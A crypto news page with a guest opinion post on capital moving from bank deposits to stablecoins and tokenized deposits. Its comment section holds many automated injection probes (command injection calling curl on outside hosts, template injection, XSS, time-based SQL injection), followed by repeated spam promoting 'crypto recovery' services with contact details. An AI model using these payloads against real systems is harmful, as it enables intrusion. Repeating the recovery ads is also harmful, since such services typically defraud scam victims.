This site uses cookies. Browsing the site, you agree to the use of cookies. If you need more information, please visit the Cookies Policy page
Cryptocurrencies: 9549 / Markets: 112919
Market Cap: $ 3 752 086 751 938 / 24h Vol: $ 416 112 816 257 / BTC Dominance: 60.08963291637%

Н News

The capital migration that could reshape finance

The following is a guest post and opinion from Patrick Heusser, Head of Lending & TradFi at Sentora.

Capital is undergoing a structural reallocation. What once sat securely in fractional-reserve bank accounts is now increasingly flowing into fully funded, blockchain-based financial systems. From stablecoins like USDC and USDT to tokenized T-bills, institutional and retail capital is chasing programmability, global interoperability, and perceived safety. This is not a simple migration of money; it is a replatforming of financial infrastructure. In this deep dive, we examine the risks, mechanics, and strategic responses to this shift—and ask whether a hybrid system can emerge before systemic cracks appear.

Two Worlds, One Capital Base

The Fractional-Reserve Fiat Model

In traditional banking, commercial banks operate on fractional reserves. Deposits are only partially backed, and banks create money through lending. This model offers high capital efficiency and elasticity; banks can support economic growth by expanding credit, but at the cost of fragility, maturity mismatches, and systemic dependency on central banks.

Payment rails (ACH, SEPA, card networks) rely on netting, credit lines, and settlement-finality delays. Liquidity is managed across a network of intermediaries and backstops.

The Fully Funded Blockchain Model

In contrast, stablecoins operate on a one-to-one reserve basis. Transactions settle instantly, transparently, and are irreversible. However, they require pre-funding and, by design, eliminate endogenous credit creation. Liquidity must be fully available before transactions occur. This rigidity offers trust minimization and atomicity, but also introduces capital intensity and an operational burden when interfacing with TradFi.

The concept of “singleness of money” is challenged by this divide: stablecoins cannot seamlessly substitute for fractional bank deposits unless deep interoperability and synchronized settlement are established.

The Capital Shift: From Bank Deposits to Stablecoins

A growing share of global liquidity is migrating into stablecoins. This movement represents more than technological preference—it is a shift in monetary architecture. As Marvin Barth articulates, this could effectively implement a modern version of the Chicago Plan, disintermediating banks and replacing deposit money with full-reserve alternatives.

Capital moving from bank accounts to stablecoins reduces the banking sector’s access to cheap funding, raises competition for deposits, and may necessitate credit contraction. In aggregate, this migration locks capital into instruments that, while liquid, are not economically leveraged.
The implications ripple beyond banking: as stablecoin issuers invest in T-bills and repos, they crowd out other credit users, distort short-term funding markets, and elevate systemic liquidity needs.

Risks and Tensions in a Non-Fractional Environment

Stablecoins promise real-time settlement and global reach, yet their fully reserved design introduces frictions that the credit-based banking system never had to confront. Because a stablecoin cannot lend on its own balance sheet, any yield must come from taking explicit risk elsewhere—risk that large institutions will only bear when compensation, clarity, and infrastructure are sufficient.

Where the frictions arise

  • The real cost of on-chain yield. To earn anything above zero, reserves must be deployed into DeFi lending markets, active-validation services, or structured-yield products such as tranching protocols, all of which add new layers of credit and smart-contract exposure.
  • Pre-funding both legs of a trade. As our fiat-versus-stablecoin settlement study shows, a participant often has to hold full collateral in two places at once, tying up balance-sheet capacity that could otherwise generate return.
  • Liquidity strains from mismatched finality. Markets must keep capital parked simultaneously in “instant” on-chain rails and in slower, batched banking rails simply to reconcile the two worlds.

The Incumbent Response: JPMorgan’s Deposit Token

Sensing these pressures, JPMorgan has launched tokenized deposits—programmable, on-chain claims on the bank’s own liabilities that still sit inside a fractional-reserve, regulated framework. With this move, the bank aims to

  • Keep control of customer balances and associated credit relationships,
  • Deliver the user experience of stablecoins without surrendering monetary control, and
  • Pre-empt large-scale migration of deposits to third-party issuers such as Circle or PayPal.

It is, in essence, a defensive play: bring deposit money on-chain before stablecoins siphon it away. The architecture is technically elegant but not without trade-offs. Users may assume atomic, irrevocable settlement, yet the underlying asset remains embedded in a credit system subject to maturity transformation and regulatory intervention—an opacity that contrasts sharply with the transparent-reserves ethos of non-fractional stablecoins.

A Hybrid Future?

Concepts such as the one from JPMorgan mentioned above raise an interesting question. Can we avoid the binary choice between rigid, fully funded systems and elastic, credit-generating banks? Emerging solutions suggest that we can:

  • Ubyx: structured tranching to create real yield from risk allocation
  • Insurance: regulated insurance overlays using idle crypto collateral
  • Tokenized T-bill wrappers: yield with minimal credit risk
  • CDOR Futures (in development): based on the live CDOR index, these synthetic interest-rate products would enable capital-efficient rate exposure without full notional lock-up—though they have not yet been launched.

These hybrid models aim to balance capital efficiency with transparency and programmability. They are not frictionless, but they are functional.

Why the Battle for Base Money Matters

Money itself is splintering into multiple on-chain and off-chain forms, yet the pool of deployable capital is finite. The contest between fractional-reserve banking and non-fractional stablecoins is therefore a fight over who gets to issue, settle, and earn the spread on digital dollars. Left unchecked, the shift could erode credit creation and the liquidity buffers that support traditional finance. Guided well, it promises a safer, faster, more programmable financial stack.

The landscape is consolidating around players that can straddle both worlds of money:

  • Specialized intermediaries—Sentora, Stripe, Visa, and other fintechs engineered for crypto rails—who absorb the pain of conversion, custody, and risk management.
  • Capital-efficient protocols that generate yield from real economic activity rather than temporary token incentives.
  • Banks that adapt to tokenize deposits while preserving the strength of their own balance sheets.

The real winners will be those who can intermediate between the two monetary systems and reduce the capital intensity of bridging them.

The post The capital migration that could reshape finance appeared first on CryptoSlate.

Source

  • 09.10.25 08:08 pHqghUme

    |echo oljujl$()\ pbqbzp\nz^xyu||a #' |echo oljujl$()\ pbqbzp\nz^xyu||a #|" |echo oljujl$()\ pbqbzp\nz^xyu||a #

  • 09.10.25 08:08 pHqghUme

    can I ask you a question please?|echo qswrbu$()\ ovnycc\nz^xyu||a #' |echo qswrbu$()\ ovnycc\nz^xyu||a #|" |echo qswrbu$()\ ovnycc\nz^xyu||a #

  • 09.10.25 08:08 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:08 pHqghUme

    expr 9000227416 - 917575

  • 09.10.25 08:08 pHqghUme

    (nslookup -q=cname hitrirljyvgim44c57.bxss.me||curl hitrirljyvgim44c57.bxss.me))

  • 09.10.25 08:08 pHqghUme

    $(nslookup -q=cname hitnaasjhmbqf44699.bxss.me||curl hitnaasjhmbqf44699.bxss.me)

  • 09.10.25 08:08 pHqghUme

    &nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&'\"`0&nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&`'

  • 09.10.25 08:08 pHqghUme

    &(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&'\"`0&(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&`'

  • 09.10.25 08:08 pHqghUme

    |(nslookup -q=cname hitfmymffseet6e8b2.bxss.me||curl hitfmymffseet6e8b2.bxss.me)

  • 09.10.25 08:08 pHqghUme

    `(nslookup -q=cname hitohduurqhba06a59.bxss.me||curl hitohduurqhba06a59.bxss.me)`

  • 09.10.25 08:08 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:08 pHqghUme

    ;(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)|(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)&(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)

  • 09.10.25 08:08 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitanwkhusxwr37069.bxss.me||curl${IFS}hitanwkhusxwr37069.bxss.me)

  • 09.10.25 08:09 pHqghUme

    &(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&`'

  • 09.10.25 08:09 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 04:41 luciajessy3

    Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…

To join the Chat, you need a free pro-blockchain.com account. Enter Registration
Have questions?
We're available 24/7
Help Icon